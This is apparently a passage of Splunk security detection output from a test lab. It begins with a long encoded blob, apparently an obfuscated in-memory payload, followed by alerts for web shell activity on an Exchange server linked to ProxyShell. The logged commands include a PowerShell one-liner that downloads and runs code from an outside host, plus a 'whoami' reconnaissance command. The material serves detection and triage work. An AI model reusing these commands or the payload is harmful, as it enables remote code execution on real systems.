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chdx0iCfOoZjNlZRhWL6s3Il/xeKhmL7oI4fLbfX7gdqjPdXDcVivLXV0jI6DnL6bjVhaoNXQQ3KbxVQSuJzypK6PaHlYl5SMjacgxo9oMViblI3zIK6PaCFYg5SMOZBgdUfqqNRDjfH7gdqjPEOqm41ULqTcSo9l8ViXlJxIMyCqj2Q5WJ+UnEghiGOtRx8gpGGYrVDjlJyUeY4sgVtHcVjPcVi9zdctKXyMjoOczfuBJJXt+4Haoz3JycK58J3Wo06pW36p+2xh+L1UnEOPIG8sm0NzcqiWg5ScQ6qbcVQWoZisI5apmL6h+36jyoMEgqTc5qH4vricSETcgYqszGOxRxqh+26jgfXjq4Haoz3V0qNuuZN+o0hhmL1UnEOPICKjloOUnoMwnSSN5Vz8IVitwqG4rqPmgwCCpPyAg6RE/LWGrOhj0Ucp4qOR8fX7gdqjPos/TISMjdNwVEONFqmbXrl7ViEWIyxJzIyN6puNXLEljy6vJ3Nx6EOPKISIjI66mN97c3HPcVSfkpjfe3NwhIyIj3DZ7UyEzpuNWMtw2f1IhM3NJYsvVytzcesjqqB5/UyEzSSNJJ65m03Ooppve3Nyg4zNz3BXc9KbjV+xJI0krrmbXc6hm06DjY3PcFdz0puNXm65my3MslGbVSSdz3Fbb3BXcNk9TITOm41e9LJRm1XPLdTAiI6jbLJRm1XpzSSN0y6KuIiMslGbVoOcv8stzqGYrdNxTJ8tC0NzcoOcvpuNWMElhy+HK3Nx6dMsdMSIjyg3c3NyuZs9zLJRm1XN03Fbb3BXcNlNTITOm41Y/3DZ/UiEzc0liyxLK3Nx0yy8xIiOg5y/K2d3c3BDjY3zq4Haoz6LPIyIjI3V03FAv3FAr3FYvSSPcUDPcVitJI0kh3Ba/XSAz3Ba3XSAz3Ba7XSAz3DYfUyEzpuNXKxDjY8rmIyMj3DZ/UiEzoNsgLKaCIyMjqDCo4a5TIqkrY6fqVtoI5ZwjIiMjGOQsoKcjIyNLf/YhM3HLCDAiI6jTenqm1VdSdK6mI9zc3Ekjc8unryIjgkv2ITOqJYJP9iEzqmUnoOcvoOUqqOWuWyKpK2On6lbaCORzrqYj3NzcdXPLQFkiI66mI9zc3KDnL65bIqkrY6fqVtoI5GNzrqYj3Nzcc211yx1ZIiOg5y9wyz8jIyN6yDbcNn9SITNz3B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 to load .net code in memory with EventCode 4104 in host exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664804631, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="3", dest="exchange01.attackrange.local", firstTime="2022-10-03T12:10:44", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:11:38", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="unknown" 1664804631, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="3", dest="exchange01.attackrange.local", firstTime="2022-10-03T12:10:44", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:11:38", original_file_name="Cmd.Exe", parent_process="c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeOWAAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipmb991e788-0137-49d8-bf80-6e84f2791064 -h \"C:\\inetpub\\temp\\apppools\\MSExchangeOWAAppPool\\MSExchangeOWAAppPool.config\" -w \"\" -m 0", process="\"cmd.exe\" /c powershell.exe -nop -c \"IEX ((new-object net.webclient).downloadstring('http://kykyses.com/host'))\"", process="cmd.exe /c whoami", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="SYSTEM" 1664804631, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="3", dest="exchange01.attackrange.local", firstTime="2022-10-03T12:10:44", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:11:38", original_file_name="unknown", parent_process="C:\\Windows\\System32\\inetsrv\\w3wp.exe", process="C:\\Windows\\System32\\cmd.exe /c powershell.exe -nop -c \"IEX ((new-object net.webclient).downloadstring('http://kykyses.com/host'))\"", process="C:\\Windows\\System32\\cmd.exe /c whoami", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="EXCHANGE01$" 1664798400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], 